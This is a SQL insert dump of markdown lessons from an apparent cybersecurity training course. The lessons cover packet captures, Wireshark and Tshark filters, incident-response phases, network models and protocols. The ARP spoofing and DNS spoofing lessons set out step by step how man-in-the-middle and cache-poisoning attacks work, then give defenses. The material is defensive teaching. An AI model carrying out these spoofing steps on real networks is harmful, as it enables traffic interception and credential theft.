(1020, 807, '# Introduction to Packet Captures\n\nNetwork Forensics is the capture, recording, and analysis of network events in order to discover the source of security attacks. The foundational artifact of network forensics is the **Packet Capture (PCAP)** file.\n\n## Why Network Forensics?\nMalware can hide on a hard drive using rootkits. Attackers can delete Event Logs. But it is incredibly difficult for an attacker to hide their network traffic from a properly configured network sensor. \n*   *\"Packets don\'t lie.\"* If data left the building, there is a record of it.\n\n## The PCAP Format\nA `.pcap` (or the newer `.pcapng`) file contains a complete, byte-for-byte copy of every network packet that passed a specific point on the network during the capture window.\n\nThis is fundamentally different from **NetFlow logs**. \n*   **NetFlow:** Like a phone bill. It tells you *who* talked to *whom*, *when*, and for *how long* (e.g., IP A talked to IP B on port 443 for 5 minutes). It does *not* contain the conversation.\n*   **PCAP:** Like a recorded phone call. It contains the metadata *and* the actual data payloads (the contents of the downloaded file, the HTTP GET arrays, the DNS queries).\n\n## Capturing Traffic\nTo capture traffic, sensors (often running software like `tcpdump` or `Zeek`) are placed at strategic chokepoints in the network:\n*   **Ingress/Egress points:** The main firewall connecting the corporate network to the Internet.\n*   **Core Switches:** Monitoring internal Lateral Movement (e.g., User VLAN talking to the Server VLAN).\n*   **Endpoint:** Capturing traffic directly on a specific laptop using tools like Wireshark.\n\n**Promiscuous Mode:** Normally, a network card only reads packets addressed specifically to its own MAC address. To capture all traffic on a network segment, the network interface card (NIC) must be put into \"Promiscuous Mode,\" telling it to read everything it sees.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1021, 808, '# Wireshark Fundamentals\n\nWireshark is the world\'s foremost network protocol analyzer. It allows you to open PCAP files and view the captured network traffic at a microscopic level.\n\n## The Three-Pane View\nWhen you open a PCAP in Wireshark, the interface is split into three main panels:\n1.  **Packet List (Top):** Shows a chronological list of every captured packet, with basic summary info (Source IP, Destination IP, Protocol, Length).\n2.  **Packet Details (Middle):** Shows the selected packet broken down layer by layer, matching the OSI model (e.g., Ethernet frame -> IPv4 header -> TCP header -> HTTP payload).\n3.  **Packet Bytes (Bottom):** Shows the raw hexadecimal and ASCII representation of exactly what the raw packet looks like in binary.\n\n## Display Filters\nPCAP files can contain millions of packets. To find evil, you must master Display Filters. They allow you to hide the noise and focus only on relevant traffic.\n\n*   **Filter by IP:**\n    *   `ip.addr == 192.168.1.50` (Shows packets where this IP is either the source OR destination)\n    *   `ip.src == 10.0.0.5` (Shows packets originating from this IP)\n*   **Filter by Protocol:**\n    *   `http` (Shows only unencrypted web traffic)\n    *   `dns` (Shows only DNS queries and responses)\n*   **Filter by Port:**\n    *   `tcp.port == 443` (Shows typical HTTPS traffic)\n    *   `udp.port == 53` (Shows typical DNS traffic)\n*   **Combining Filters (Boolean Logic):**\n    *   `ip.src == 192.168.1.100 && tcp.port == 80` (Finds HTTP traffic leaving a specific host)\n    *   `http.request.method == \"POST\"` (Finds data being uploaded/sent to a web server)\n\n## \"Follow TCP Stream\"\nThis is arguably Wireshark\'s most powerful feature for analysts.\n\nA single file download might span 500 individual packets. Trying to read the file chunk by chunk in the \"Packet Bytes\" pane is impossible. \n\nBy right-clicking a packet and selecting **Follow -> TCP Stream**, Wireshark automatically reassembles all 500 packets in the correct order, strips away the networking headers, and displays the pure application data (the actual conversation) in a clean, readable text window.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1022, 809, '# Analyzing Protocols: DNS and HTTP\n\nMost malware needs to communicate with the outside world. To blend in, it often uses the same protocols as normal web browsing: DNS and HTTP. \n\n## DNS (Domain Name System)\nBefore malware can connect to `evil.com`, it must ask DNS for the IP address of that domain.\n*   **Port:** UDP 53.\n*   **Forensic Value:** DNS occurs *before* the connection. Because DNS is usually unencrypted, you can see every domain a computer tries to visit.\n*   **Key Indicator:** Look for DGA (Domain Generation Algorithms). If you see a machine making DNS queries for `qbxvzmpklj.com`, `zxywqabcn.net`, etc., it is highly likely infected with malware trying to find its Command and Control server.\n\n## HTTP (Hypertext Transfer Protocol)\nHTTP is the foundation of the web, but it\'s also perfect for malware because it is almost never blocked by firewalls. \n\nWhen analyzing HTTP, look closely at these fields:\n1.  **User-Agent:** This tells the server what browser the client is using (e.g., `Mozilla/5.0 (Windows NT 10.0...)`). \n    *   *Red Flag:* Malware often uses default, hardcoded User-Agents missing typical browser strings, like simply `curl/7.68.0`, `python-requests/2.25.1`, or even unique strings like `Go-http-client/1.1`.\n2.  **URI (Uniform Resource Identifier):** The actual path of the file requested (e.g., `/images/logo.png`).\n    *   *Red Flag:* Extremely long URIs with random characters might indicate data exfiltration encoded in the URL itself.\n3.  **HTTP Status Codes:**\n    *   **200 OK:** The server successfully received and answered the request (The malware successfully downloaded its payload).\n    *   **404 Not Found:** The target file isn\'t there (The C2 server infrastructure might have been taken down).\n\n## Extracting Files from PCAPs\nIf an employee downloads a suspicious executable over HTTP (unencrypted), that entire executable is stored inside the PCAP file. You can extract it.\n\nIn Wireshark:\n1. Go to **File -> Export Objects -> HTTP**.\n2. Wireshark will present a list of every file transferred over HTTP during the capture.\n3. Select the file and click \"Save As\" to dump the actual file to your hard drive for malware analysis.', 'markdown', 8, '2026-03-09 22:28:54', '2026-03-09 22:28:54');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(1023, 810, '# Tshark & Command Line Analysis\n\nWireshark is great, but its graphical interface crashes when trying to open massive PCAP files (e.g., a 10GB capture from a busy router). \n\nWhen dealing with Big Data, analysts turn to **Tshark**.\n\n## What is Tshark?\nTshark is the command-line version of Wireshark. It uses the exact same parsing engine and the exact same display filters, but it runs entirely in the terminal.\n\nBecause it doesn\'t have to render a GUI, it is incredibly fast and uses vastly less RAM. It is also easily scriptable in Bash.\n\n## Basic Syntax\n*   **Read a PCAP:** `tshark -r capture.pcap`\n*   **Apply a Filter:** `tshark -r capture.pcap -Y \"http.request.method == GET\"` (Notice the capital `-Y` for display filters).\n\n## The Power of Fields (-T fields)\nThe true power of Tshark is its ability to extract only specific pieces of data from a packet, turning a messy PCAP into a clean CSV file that can be fed into Excel, Splunk, or ElasticSearch.\n\nUse `-T fields` to tell Tshark you only want specific data.\nUse `-e <field_name>` to specify exactly what you want.\n\n**Example 1: Extract all DNS queries**\n`tshark -r capture.pcap -Y \"dns.flags.response == 0\" -T fields -e dns.qry.name`\n*This tells Tshark: Read the file, filter for DNS requests (not responses), and print out only the domain name that was queried.*\n\n**Example 2: Create an HTTP forensic timeline**\n`tshark -r capture.pcap -Y http.request -T fields -e frame.time -e ip.src -e http.request.uri -e http.user_agent`\n*This creates a clean log file showing the Time, the Source IP, the requested URL, and the User-Agent for every HTTP request in the entire capture.*\n\n## Combining with Bash\nBecause Tshark outputs text, you can pipe it into standard Linux tools like `grep`, `sort`, and `uniq`.\nIf you want to see the top 5 most frequently visited domains:\n`tshark -r capture.pcap -Y dns -T fields -e dns.qry.name | sort | uniq -c | sort -nr | head -n 5`', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1024, 811, '# Phase 1 & 2: Preparation and Identification\n\nThe most widely adopted Incident Response framework is the **PICERL** methodology, defined by SANS. It stands for Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned.\n\n## 1. Preparation\n*\"You don\'t want your first time figuring out how to block an IP address to be during a ransomware attack at 3:00 AM.\"*\n\nPreparation is everything done *before* an attack happens. It is the most critical phase.\n*   **Creating the Team:** Establishing the Computer Security Incident Response Team (CSIRT). Knowing exactly who to call (external forensics, legal counsel, PR firm).\n*   **Infrastructure Setup:** Deploying Endpoint Detection and Response (EDR) agents, configuring central logging (SIEM), and ensuring network segmentation.\n*   **Playbooks:** Writing step-by-step guides for handling specific incidents (e.g., \"Ransomware Playbook\", \"Phishing Playbook\").\n*   **Tabletop Exercises:** Conducting simulated cyber attack drills with executives and technical teams to practice the response.\n\n## 2. Identification\nIdentification is the process of determining whether an event is actually a security incident, and if so, determining its scope.\n\n*   **Events vs. Incidents:** An *Event* is anything that happens on a network (a user logging in, a firewall blocking a packet). An *Incident* is a violation of security policy (a user logging in *from Russia using stolen credentials*).\n*   **Indicators of Compromise (IoCs):** Analysts use IoCs to identify bad activity. These are technical artifacts like malicious IPs, domains, or file hashes.\n*   **Alert Triage:** SOC analysts review alerts from the SIEM. If an alert is deemed a true positive, the Incident Response process officially begins.\n*   **Scoping:** Answering the crucial question: *\"How bad is it?\"* Did the attacker compromise one laptop, or the entire Active Directory domain controller database? You cannot contain an incident if you do not know the full scope.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1025, 812, '# Phase 3: Containment\n\nOnce an incident is identified and scoped, the immediate goal is to stop the bleeding. **Containment** is about preventing the attacker from doing any further damage or spreading to other systems.\n\n## The Containment Dilemma\nThere are two main strategies for containment, and choosing the right one requires executive approval.\n\n1.  **Immediate Containment (Pulling the Plug):**\n    *   *Action:* As soon as a compromised machine is found, it is instantly disconnected from the network.\n    *   *Pros:* Stops the attacker dead in their tracks. Prevents data exfiltration and ransomware encryption.\n    *   *Cons:* Alerts the attacker that you know they are there. If you haven\'t fully scoped the incident, the attacker will immediately activate their dormant \"Plan B\" backdoors on other systems and bury themselves deeper. Furthermore, you lose Volatile Evidence (RAM) if the machine is powered off.\n2.  **Delayed Containment (Monitoring):**\n    *   *Action:* The defenders leave the compromised system online and silently watch the attacker.\n    *   *Pros:* Allows defenders to fully understand the attacker\'s toolkit, discover all their backdoors, and fully scope the incident. Gives time to capture RAM and network packets.\n    *   *Cons:* Highly risky. The attacker might suddenly decide to steal sensitive data or deploy ransomware while you are watching them.\n\n## Containment Actions\nIf the decision is made to contain, the actions must be swift and comprehensive:\n*   **Network Segmentation:** Moving infected hosts to an isolated Quarantine VLAN where they cannot talk to the internet or the rest of the corporate network.\n*   **Firewall Blocks:** Blocking the known Command and Control (C2) IP addresses and domains at the perimeter firewall.\n*   **Account Disablement:** Forcing password resets on compromised user accounts and disabling compromised service accounts.\n*   **Endpoint Isolation:** Using EDR tools to logically cut the machine\'s network access, allowing it to *only* communicate with the IR team\'s forensic servers.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1026, 813, '# Phase 4 & 5: Eradication and Recovery\n\nAfter the attacker is contained in a box and can no longer move, you must remove them from the environment and get the business back online safely.\n\n## Phase 4: Eradication\nEradication is the actual removal of the threat.\n\n*   *\"Whack-a-Mole\" is not a strategy.* You cannot just delete the single malware file you found and call it a day. If you missed a persistent backdoor in the registry, the attacker will be back in 5 minutes.\n*   **Complete Removal:** You must delete malware, remove malicious scheduled tasks, delete attacker-created user accounts, and fix the vulnerability that allowed them in the first place (e.g., patching the exploited firewall, or implementing MFA).\n*   **Nuking from Orbit:** Because advanced malware is so good at hiding, standard IR practice is often to skip manual deletion. Instead, the infected machine\'s hard drive is completely wiped, and the OS is reinstalled from a known-good, pristine image. \"When in doubt, wipe it out.\"\n\n## Phase 5: Recovery\nRecovery is the process of putting the systems back into the production environment and ensuring they are clean.\n\n*   **Restoring from Backup:** If a machine was wiped (or encrypted by ransomware), the data must be restored from secure, offline backups.\n*   **Reconnecting:** Slowly and carefully moving the repaired systems out of the Quarantine VLAN and back into the production network.\n*   **Enhanced Monitoring:** The days following recovery are critical. The IR team will place the recovered systems under extreme scrutiny, looking for any signs that the eradication failed and the attacker has returned.\n*   **Business Continuity:** Restoring normal business operations, which might involve bringing email servers back online or reopening customer portals.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1027, 814, '# Phase 6: Lessons Learned\n\nOften skipped but incredibly vital, the \"Lessons Learned\" phase is where the organization improves its defenses based on the failures of the past.\n\n## The Post-Incident Report\nWithin two weeks of closing the incident, the Incident Response team must produce a comprehensive written report.\n*   **The Timeline:** A blow-by-blow, minute-by-minute account of exactly what the attacker did, and exactly how the defense team responded.\n*   **Root Cause Analysis:** Precisely how the attacker gained initial access (The \"Patient Zero\" vector). E.g., *\"Employee Bob Smith clicked a link in a phishing email on Tuesday.\"*\n*   **The Impact:** Exactly what data was stolen, how much money was lost, and the total downtime of the business. (This is usually required for cyber insurance claims and legal/regulatory compliance).\n\n## The Post-Mortem Meeting\nThe IR team holds a meeting with executives and IT managers to brutally honestly evaluate the response.\n\n*   *What went right?* (e.g., the EDR tool successfully blocked the ransomware from spreading past the initial host).\n*   *What went wrong?* (e.g., it took the SOC 14 hours to notice the alert; the backups for the HR database were corrupted and failed to restore).\n\n## Continuous Improvement\nThe ultimate goal of this phase is actionable change to ensure the same attack never succeeds again.\n*   If the attacker used a stolen password, the business implements mandatory Multi-Factor Authentication (MFA). \n*   If the IR team didn\'t know how to contain the threat quickly, the business rewrite the playbooks and funds more tabletop training exercises.\n*   The output of \"Lessons Learned\" feeds directly back into Phase 1, \"Preparation\", creating a continuous loop of strengthening security.', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1028, 815, '# The OSI & TCP/IP Models\n\nTo understand how to secure a network, you must first understand how a network functions. When you type `google.com` into your browser, a complex sequence of events occurs in milliseconds to fetch that webpage.\n\nNetwork communication is broken down into theoretical layers. The two main models used to describe this are the **OSI Model** (7 layers) and the practical **TCP/IP Model** (4 layers).\n\n## The OSI Model (Open Systems Interconnection)\nThis is a conceptual framework used to understand and standardize the functions of a telecommunication system.\n\n1.  **Layer 7: Application** - The layer the user interacts with (HTTP, DNS, SMTP, FTP).\n2.  **Layer 6: Presentation** - Data translation, encryption (SSL/TLS), and compression.\n3.  **Layer 5: Session** - Establishing, maintaining, and terminating \"sessions\" between applications.\n4.  **Layer 4: Transport** - Reliable vs. unreliable delivery. Where TCP and UDP live. Data is packaged into *Segments*. Ports (like port 80 or 443) operate here.\n5.  **Layer 3: Network** - IP Addressing and Routing. How data gets from one network to an entirely different network. Data is packaged into *Packets*. Routers operate here.\n6.  **Layer 2: Data Link** - MAC Addressing. How data moves between devices on the *same* local network. Data is packaged into *Frames*. Switches operate here.\n7.  **Layer 1: Physical** - The actual cables, radio waves (Wi-Fi), fiber optics, and electrical signals representing 1s and 0s.\n\n## The TCP/IP Model\nWhile the OSI model is great for theory, the internet actually runs on the TCP/IP model, which condenses the 7 layers into 4 practical layers:\n\n1.  **Application Layer** (Combines OSI Layers 5, 6, 7): HTTP, DNS, SSH.\n2.  **Transport Layer** (Matches OSI Layer 4): TCP, UDP.\n3.  **Internet Layer** (Matches OSI Layer 3): IPv4, IPv6, ICMP.\n4.  **Network Access Layer** (Combines OSI Layers 1, 2): Ethernet, Wi-Fi, MAC addresses.\n\n## Encapsulation\nWhen you send an email, the data moves *down* the OSI layers on your computer. \n*   Your email app (L7) passing data to the Transport layer (L4), which adds a TCP header.\n*   It goes down to the Network layer (L3), which adds an IP header (Source and Dest IP).\n*   It goes down to the Data Link layer (L2), which adds a MAC header.\n*   It finally goes out the Physical layer (L1) as electricity across the wire.\n\nWhen the receiving server gets the electrical signals, it reverses the process, moving *up* the layers (De-encapsulation) until the raw email text reaches the Application layer.', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1029, 816, '# Transmission Control Protocol vs. User Datagram Protocol\n\nAt Layer 4 (the Transport Layer), the two dominant protocols are TCP and UDP. Understanding the difference is crucial for identifying how network attacks work and how Firewalls are configured.\n\n## TCP (Transmission Control Protocol)\nTCP is reliable, connection-oriented, and stateful. It guarantees that data will arrive, and in the correct order.\n\n*   **The 3-Way Handshake:** Before ANY data is sent, TCP establishes a strict connection.\n    1.  **SYN:** Client says \"I\'d like to talk to you.\"\n    2.  **SYN-ACK:** Server says \"Okay, I acknowledge your request, let\'s talk.\"\n    3.  **ACK:** Client says \"Great, I\'m sending data now.\"\n*   **Reliability:** Once connected, every time a computer sends a segment of data, the receiving computer must reply with an acknowledgment (ACK). If the sender doesn\'t get the ACK (because the packet dropped over Wi-Fi), it will automatically retransmit the data.\n*   **Use Cases:** Web Browsing (HTTP/HTTPS), Email (SMTP), File Transfers (FTP/SMB), SSH. If a single byte is missing from a downloaded executable, the file breaks. TCP ensures every byte arrives.\n\n## UDP (User Datagram Protocol)\nUDP is unreliable, connectionless, and stateless. It just throws data at the destination and hopes it gets there.\n\n*   **No Handshake:** UDP does not establish a connection first. It just starts sending packets immediately.\n*   **No Acknowledgments:** If a packet gets dropped by a router on the internet, it\'s gone forever. UDP does not resend lost data.\n*   **Why use it?** Speed and low overhead. Because there are no handshakes or ACKs, UDP is much faster.\n*   **Use Cases:** Live Video Streaming (Zoom, Twitch), VoIP (Phone calls), DNS queries, Online Gaming. If you drop a single frame in a 60fps video game, it doesn\'t matter, you don\'t want the game to pause to re-download that old frame. You just proceed to the next current frame.\n\n## Ports\nBoth TCP and UDP use **Ports** to direct traffic to the right application on a computer. A computer has 1 IP address, but can have up to 65,535 ports open simultaneously. \n*   If traffic arrives at IP 192.168.1.10 on TCP Port 80, the OS hands that data to the Web Server software.\n*   If traffic arrives at TCP Port 22, the OS hands it to the SSH Server software.', 'markdown', 6, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1030, 817, '# Core Protocols & Services\n\nTo detect anomalies, you must know what normal looks like. Attackers constantly abuse these foundational protocols.\n\n## DNS (Domain Name System)\n*   **Port:** UDP 53 (and sometimes TCP 53)\n*   **Function:** The phonebook of the internet. It translates human-readable domain names (`infoseclabs.com`) into machine IP addresses (`104.21.5.12`).\n*   **Security Context:** Attackers use DNS for Command & Control (C2) beacons, data exfiltration (DNS Tunneling), and redirecting traffic via DNS Spoofing.\n\n## DHCP (Dynamic Host Configuration Protocol)\n*   **Port:** UDP 67 (Server) and UDP 68 (Client)\n*   **Function:** Automatically assigns IP addresses, Subnet Masks, and Default Gateways to devices when they join a network.\n*   **Security Context:** Rogue DHCP servers can assign malicious DNS settings to victim computers, executing Man-In-The-Middle attacks almost invisibly.\n\n## ARP (Address Resolution Protocol)\n*   **Layer:** Layer 2 (Data Link) / Layer 3 (Network) boundary.\n*   **Function:** Maps an IP address to a physical MAC address on a local network. If computer A (IP 10.0.0.5) wants to talk to the Router (IP 10.0.0.1) on the same Wi-Fi, it shouts \"Who has 10.0.0.1?\" via ARP. The router replies with its physical MAC address so the switch knows where to send the frame.\n*   **Security Context:** **ARP Spoofing**. An attacker can lie and reply to the ARP request saying *they* are the router. The victim then sends all their traffic to the hacker instead of the real router.\n\n## ICMP (Internet Control Message Protocol)\n*   **Layer:** Layer 3 (Network)\n*   **Function:** Used for network diagnostics and error reporting. It is not used for transferring data between systems. The `ping` command and `traceroute` commands use ICMP Echo Requests and Echo Replies.\n*   **Security Context:** Attackers use ICMP for \"Ping Sweeps\" to map out live hosts on a network. It can also be abused for ICMP tunneling to bypass firewalls or launch Smurf DDoS attacks.\n\n## HTTP/HTTPS (Hypertext Transfer Protocol)\n*   **Port:** TCP 80 (HTTP) and TCP 443 (HTTPS)\n*   **Function:** Foundation of the World Wide Web. Facilitates downloading web pages, submitting forms (POST), and API communication. HTTPS adds a layer of encryption (TLS/SSL) to secure the data in transit.\n*   **Security Context:** The vast majority of malware C2 traffic hides inside HTTPS, blending in with regular employee web browsing to evade detection by firewalls.', 'markdown', 8, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1031, 818, '# Navigating Wireshark\n\nWireshark is the industry standard for network protocol analysis. It allows you to see what\'s happening on your network at a microscopic level. It is the de facto standard across many commercial and non-profit enterprises, government agencies, and educational institutions.\n\n## The GUI Layout\nWhen you open a packet capture (PCAP) in Wireshark, the interface is divided into three main panes:\n\n1.  **Packet List Pane (Top):** This pane displays a summary of each packet captured. By default, it shows the packet number, time, source IP address, destination IP address, protocol, length, and detailed information. Clicking on a packet in this pane controls what is displayed in the other two panes.\n2.  **Packet Details Pane (Middle):** This pane shows the current packet, broken down layer by layer, closely mirroring the OSI and TCP/IP models. You can expand each layer (e.g., Ethernet II, IPv4, TCP) to see the specific hex values and how Wireshark interprets them.\n3.  **Packet Bytes Pane (Bottom):** This pane displays the raw, uninterpreted data of the selected packet in hexadecimal and ASCII format. When you select a field in the *Details Pane*, the corresponding bytes are highlighted in the *Bytes Pane*.\n\n## Basic Navigation and Sorting\n*   **Time Column:** By default, the Time column shows the seconds since the beginning of the capture. You can change this via `View -> Time Display Format` to show the actual Time of Day (e.g., `14:32:05.123`).\n*   **Sorting:** You can click on the headers in the Packet List pane to sort by Source IP, Destination IP, Protocol, or Length. This is useful for quickly finding the largest packets or sorting traffic by protocol.\n*   **Finding Packets:** You can use `Ctrl+F` (or `Cmd+F`) to search for specific strings, hex values, or display filters within the current capture.\n\n## Color Coding\nWireshark uses color-coding to help you quickly identify different types of traffic.\n*   **Green:** Typically, HTTP or routing traffic.\n*   **Light Blue:** UDP traffic (like DNS lookups).\n*   **Dark Blue/Purple:** TCP traffic.\n*   **Black/Red:** Packets with errors, warnings, or bad checksums (e.g., a TCP Retransmission or out-of-order packet).\n\n*Note: You can customize these coloring rules in `View -> Coloring Rules`.*', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1032, 819, '# Mastering Display Filters\n\nPCAP files often contain hundreds of thousands or even millions of packets. Manually scrolling through them is impossible. **Display Filters** are your strongest weapon as an analyst to cut through the noise and find the signal.\n\n*Important:* Do not confuse Display Filters with Capture Filters. Capture filters decide what data gets written to disk. Display filters hide/show data that has already been captured.\n\n## Filter Syntax Basics\nWireshark uses a very specific syntax for filtering.\n\n*   `.==` (Equals): `ip.addr == 192.168.1.100`\n*   `.!=` (Not Equals): `ip.src != 10.0.0.5`\n*   `.>` (Greater Than): `frame.len > 1500`\n\n## IP and Protocol Filtering\n*   **By IP Address:**\n    *   `ip.src == 8.8.8.8` (Shows only packets originating *from* 8.8.8.8)\n    *   `ip.dst == 8.8.8.8` (Shows only packets going *to* 8.8.8.8)\n    *   `ip.addr == 8.8.8.8` (Shows packets where 8.8.8.8 is *either* the source or destination)\n*   **By Protocol:** Just type the protocol name.\n    *   `http`\n    *   `dns`\n    *   `tcp`\n*   **By Port:**\n    *   `tcp.port == 443` (Shows HTTPS traffic)\n    *   `udp.port == 53` (Shows DNS traffic)\n\n## Boolean Operators (Combining Filters)\nTo find highly specific events, you must chain filters together.\n\n*   **AND (`&&`):** Both conditions must be true.\n    *   `ip.src == 192.168.1.50 && tcp.port == 80` (Finds HTTP traffic originating from a specific laptop).\n*   **OR (`||`):** Only one condition needs to be true.\n    *   `tcp.port == 80 || tcp.port == 443` (Shows both HTTP and HTTPS traffic).\n*   **NOT (`!`):** Excludes traffic.\n    *   `ip.addr == 192.168.1.50 && !(dns)` (Shows all traffic for that IP *except* DNS queries).\n\n## Advanced Filtering (Contains and Matches)\n*   **Contains:** Searches for a specific string payload inside the packets.\n    *   `http contains \"password\"` (Searches all unencrypted HTTP packets for the word \"password\").\n*   **Matches:** Uses Regular Expressions (Regex) for powerful pattern matching.\n    *   `http.host matches \".(cn|ru)$\"` (Finds HTTP traffic going to Russian or Chinese top-level domains).', 'markdown', 8, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1033, 820, '# Following Streams & Object Extraction\n\nWhen an attacker downloads malware via HTTP, or an employee uploads a confidential PDF via FTP, that data is split into hundreds of separate TCP segments. Looking at one packet at a time is useless for understanding the \"big picture.\"\n\n## Follow TCP Stream\nThis is arguably Wireshark\'s most powerful feature for reconstructing events.\n\nIf you right-click a packet that is part of a larger conversation (like an HTTP GET request) and select **Follow -> TCP Stream**, Wireshark performs magic:\n1.  It automatically figures out the source/dest IPs and ports.\n2.  It reassembles all the fragmented packets in the correct order.\n3.  It strips away all the OSI headers (MAC, IP, TCP headers).\n4.  It presents you with a clean text window showing *only* the application layer data.\n\n**Reading the Stream:**\n*   Text colored **Red** represents data sent from the Client to the Server (e.g., the browser asking \"GET /index.html\").\n*   Text colored **Blue** represents data sent from the Server to the Client (e.g., the server replying \"200 OK\" and the HTML code).\n\n*Note:* If you \"Follow\" a stream of an encrypted protocol like HTTPS or SSH, you will just see gibberish characters, because the payload is encrypted.\n\n## Extracting Objects\nIf you can see a file (like an image, a PDF, or an .exe) being downloaded over an unencrypted protocol (HTTP, FTP, SMB), Wireshark can carve that file right out of the PCAP and save it to your hard drive so you can analyze it.\n\n**How to Extract (HTTP):**\n1.  Go to **File -> Export Objects -> HTTP...**\n2.  Wireshark will open a window listing every single file transferred over HTTP during the entire packet capture.\n3.  It lists the Packet Number, Hostname, Content Type (e.g., `image/png` or `application/x-msdownload`), and the Filename.\n4.  You can select a suspicious file and click **\"Save\"** to put it on your Desktop. You can then submit that file to VirusTotal or analyze it in a sandbox.\n\nThis is a critical skill for extracting malware payloads that defense sensors may have missed, but the packet capture recorded.', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1034, 821, '# ARP Spoofing & Poisoning\n\nThe Address Resolution Protocol (ARP) is fundamentally insecure by design because it is a \"stateless\" and \"trusting\" protocol. It was built in the early days of networking when everyone on a local network trusted each other.\n\n## How Normal ARP Works\nAs a reminder, ARP operates at Layer 2 (Data Link). When your computer (IP: `10.0.0.5`) wants to send a packet to the internet, it must first send it to your Default Gateway (the Router, IP: `10.0.0.1`). However, switches don\'t understand IP addresses; they only understand physical MAC addresses.\n\n1.  Your computer shouts out to the entire network: *\"Who has IP 10.0.0.1? Tell 10.0.0.5.\"*\n2.  The Router (`10.0.0.1`) replies directly to your computer: *\"I am 10.0.0.1, and my MAC address is AA:BB:CC:DD:EE:FF.\"*\n3.  Your computer saves this mapping in its temporary **ARP Cache**.\n\n## The Attack: ARP Spoofing\nThe flaw in ARP is that an attacker can send out an **ARP Reply** *even if no one asked for it* (this is called a Gratuitous ARP). Furthermore, devices will gladly accept this unsolicited reply and update their ARP cache without any verification.\n\n**The Scenario:**\nLet\'s say the Hacker\'s MAC address is `66:66:66:66:66:66`.\n\n1.  The attacker sends a forged ARP Reply to the Victim (`10.0.0.5`) saying: *\"Hey, the Router (10.0.0.1) is now at MAC 66:66:66:66:66:66.\"*\n2.  The Victim\'s computer blindly trusts this and updates its ARP cache.\n3.  The attacker also sends a forged ARP Reply to the true Router (`10.0.0.1`) saying: *\"Hey, the Victim (10.0.0.5) is now at MAC 66:66:66:66:66:66.\"*\n4.  The Router blindly trusts this and updates its ARP cache.\n\n## The Result: Man-in-the-Middle (MITM)\nBecause the attacker has \"poisoned\" the ARP cache of both the Victim and the Router, all traffic flowing between them now routes directly through the attacker\'s machine. \n\nThe attacker can now:\n*   **Packet Sniff:** Read unencrypted traffic (HTTP, FTP, Telnet) in real-time, stealing passwords and session cookies.\n*   **Packet Modify:** Alter the traffic in transit (e.g., replacing a legitimate software download with a malware payload).\n*   **Denial of Service (DoS):** Simply drop all the packets from the victim, disconnecting them from the internet (a \"Blackhole\" attack).\n\n*Note: ARP Spoofing only works on the LOCAL network (LAN). An attacker in Russia cannot ARP Spoof a victim in New York, because MAC addresses do not cross routers.*', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1035, 822, '# DNS Spoofing & Hijacking\n\nIf ARP Spoofing redirects traffic based on physical MAC addresses, DNS Spoofing redirects traffic based on human-readable domain names. \n\nThe Domain Name System (DNS) translates a website name like `bank.com` into the server\'s IP address (e.g., `192.0.2.50`). If an attacker can manipulate this translation process, they control where the user goes.\n\n## Local DNS Spoofing (via MITM)\nThis is usually the next step after an attacker has successfully executed an ARP Spoofing Man-in-the-Middle attack.\n\n1.  The victim types `www.bank.com` into their browser.\n2.  The victim\'s computer sends a DNS Query asking for the IP of `bank.com`.\n3.  Because the attacker is actively performing a MITM attack via ARP Spoofing, that DNS Query flows through the attacker\'s machine.\n4.  The attacker intercepts the query and sends a fake DNS Reply back to the victim, claiming that `bank.com` is located at the Attacker\'s IP address (e.g., `10.0.0.66`).\n5.  The victim\'s browser connects to the Attacker\'s web server, which is hosting a perfect, pixel-for-pixel fake clone of the bank\'s login page. \n\nThe victim sees `www.bank.com` in the URL bar, but they are secretly typing their credentials into the attacker\'s database.\n\n## DNS Cache Poisoning (Server-Side)\nThis is a much larger scale attack. Instead of attacking a single victim, the attacker targets a recursive DNS server (like the one operated by your ISP, or even a public one like Google\'s `8.8.8.8`).\n\nThe attacker exploits vulnerabilities in the DNS server software (like BIND) to inject fake records into the server\'s cache.\nIf successful, *everyone* who relies on that DNS server will be redirected to the malicious site when they try to visit `bank.com`. This affects thousands or millions of users simultaneously.\n\n## Defending Against DNS Attacks\nBecause classic DNS operates over unencrypted UDP Port 53, it is highly vulnerable to tampering.\n*   **DNSSEC (DNS Security Extensions):** Adds cryptographic digital signatures to DNS records. When your computer looks up `bank.com`, the true owner of `bank.com` signs the response with a private key. Your computer verifies the signature with a public key. If an attacker modifies the IP address in transit, the signature breaks, and your computer drops the fake response.\n*   **DoH / DoT (DNS over HTTPS / TLS):** Encrypts the entire DNS conversation so a local MITM attacker cannot even see what domain you are querying, let alone modify the response.', 'markdown', 8, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
